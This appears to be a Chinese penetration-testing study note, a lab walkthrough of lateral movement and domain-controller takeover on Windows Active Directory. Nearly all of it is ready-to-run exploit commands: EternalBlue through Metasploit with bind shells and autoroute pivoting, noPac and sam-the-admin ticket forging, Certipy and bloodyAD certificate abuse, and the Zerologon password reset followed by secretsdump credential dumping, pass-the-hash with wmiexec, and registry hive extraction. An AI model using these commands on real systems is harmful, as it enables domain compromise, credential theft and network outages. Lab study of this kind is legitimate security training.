第133天：内网安全-横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

案例一：横向移动-系统漏洞-CVE-2017-0146

这个漏洞就是大家熟悉的ms17-010，这里主要学习cs发送到msf，并且msf正向连接后续

原因是cs只能支持漏洞检测，而msf上有很多exp可以利用

注意msf不能使用4.5版本的有bug

这里还是反弹权限，然后提权到system

设置监听器

msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
exploit

转发msf上

转发到刚才的会话上

msf成功上线

这是3网段的主机，所以可以连接到3网段所有主机，但是需要设置路由

run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表

会话放入后台

这里利用ms17-010的时候反向没有办法上线的，因为内网的主机不出网，只有正向去连接他

首先先检测是否有该漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.3.21-32 //设置扫描目标段

set threads 5 //设置扫描线程数

run

这里我的域控环境网段不是连续的，就扫描一个dc

可以利用，这里因为内网是不出网的所以需要借助已经拿到的机器，去控制目标主机，正向连接

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标或者范围
run

本来是希望去控制域控主机的，但是域控主机似乎做了某种限制，这里我控制的是sqladmin

成功

msf正向连接中，设置了路由就可以，甚至不用上传木马，不知道是不是msf17-010的溢出不用

案例二: 横向移动-域控提权-CVE-2014-6324

在这篇文章里面复现过

第130天：内网安全-横向移动&PTH哈希&PTT 票据&PTK密匙&Kerberos&密码喷射-CSDN博客

案例三：横向移动-域控提权-CVE-2021-42287

前提条件：一个域内普通账号

影响版本：Windows基本全系列

这篇文章也复现过，这里还有不同的工具

第106天：权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_windows 提权漏洞补丁 ad域-CSDN博客

方法一：

同样先上线，代理转发

项目下载地址：
https://github.com/safebuffer/sam-the-admin

python3 sam_the_admin.py 域名/'域控主机账号:密码' -dc-ip 域控ip -shell

python3 sam_the_admin.py 0day.org/'administrator:123.com' -dc-ip 192.168.3.142 -shell

查看获得的权限啊

方法二：

nopac下载地址: https://github.com/cube0x0/noPac

把这个文件导入到visual studio中

编译生成文件

在这个目录下会生成exe文件

这里按理说应该设置代理在本地运行，我是linux系统没办法设置，直接上传本地运行

出现下面的提示代表有漏洞

noPac.exe scan -domain 0day.org -user jack -pass admin!@#45

生成票据

noPac.exe -domain 0day.org -user jack -pass admin!@#45 /dc 域控名 /mAccount 乱输一个用户名 -mPassword 乱输一个密码 /service 乱输一个服务 /ptt

noPac -domain 0day.org -user jack -pass admin!@#45 /dc owa2010sp3.0day.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt

PsExec \owa2010cn-god.god.org cmd

现在查看票据里面就有一个administrator的票据

利用工具建立连接

psexec.exe \域控主机名 cmd

案例四：WIN-域控提权-CVE-2022-26923

利用条件

一个域控内普通的账号密码

并且域控内有ca证书服务器

dnshostname不唯一

查看域内是否有证书服务器

certutil -config - -ping

没有的情况

如果有证书服务器

资源下载地址：GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

安装必要的插件

python3 setup.py install

首先先申请一个证书

certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca CA服务器名 -template User -debug

certipy req '192.168.3.142/jack:admin!@#45@OWA2010SP3.0day.org' -target-ip 192.168.3.142 -ca 0day-OWA2010SP3-CA -template User -debug

检测证书

certipy auth -pfx jack.pfx -dc-ip 192.168.3.142 -debug

添加计算机账号

项目地址：GitCode - 全球开发者的开源社区,开源代码托管平台

python3 bloodyAD.py -d 域控名 -u 普通用户名 -p '普通用户密码' --host 域控ip addComputer 计算机名 '计算机密码'

python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 addComputer pwnmachine 'CVEPassword1234*'

域控计算机中这台主机被成功添加了进去

这一步是需要将计算机名更新为与域控一样的名字，在这一步实验的过程中发现无法实现，原因是由于dnshostname在这个环境当中是唯一的

python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 setAttribute 'CN=pwnmachine,CN=Computers,DC=0day,DC=org' dNSHostName '["OWA2010SP3.0day.org"]'

后续操作先看这篇文章把

第106天：权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_ad域控提权-CSDN博客

案例五：WIN-域控提权-CVE-2020-1472

影响范围以及利用条件

CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞，
影响 Windows Server 2008R2 至 Windows Server 2019 的多个版本系统，
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 .
该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows

资源下载地址

POC：https://github.com/SecuraBV/CVE-2020-1472
EXP：https://github.com/dirkjanm/CVE-2020-1472
Impacket：https://github.com/fortra/impacket

获取计算机名，这里这条命令设置代理后，好像识别不出来这条命令无法执行，我只能设置在一个网段运行。。。，但是也有别的办法获取

nbtscan -v -h 192.168.3.21

可以用这种方式获取计算机

测试漏洞是否能够正常使用

python3 zerologon_tester.py OWA2010SP3 192.168.3.142

因为设置代理的话这里是一个一个数据包进行发送的，所以会比较慢。

清空密码凭证

python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142

利用impack套件导出hash

python3 secretsdump.py 0day.org/[email protected] -no-pass

导出hash，上面的admin是域控本地的admin而下面的是域控内的

利用套件里面的wmiexec进行连接

python3 wmiexec.py Administrator@192.168.3.142 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

这中方式一般不要使用，会导致内网崩溃！！！，用完记得恢复hash

重置hash的方式：https://zhuanlan.zhihu.com/p/627855713

运行这三条命令

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

生成三个文件

这三个文件保存在本地，利用套件里面的secretdump文件恢复 ，但是他这个只能是在系统本地运行，系统不一定有python环境啊

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

利用powershell执行这条命令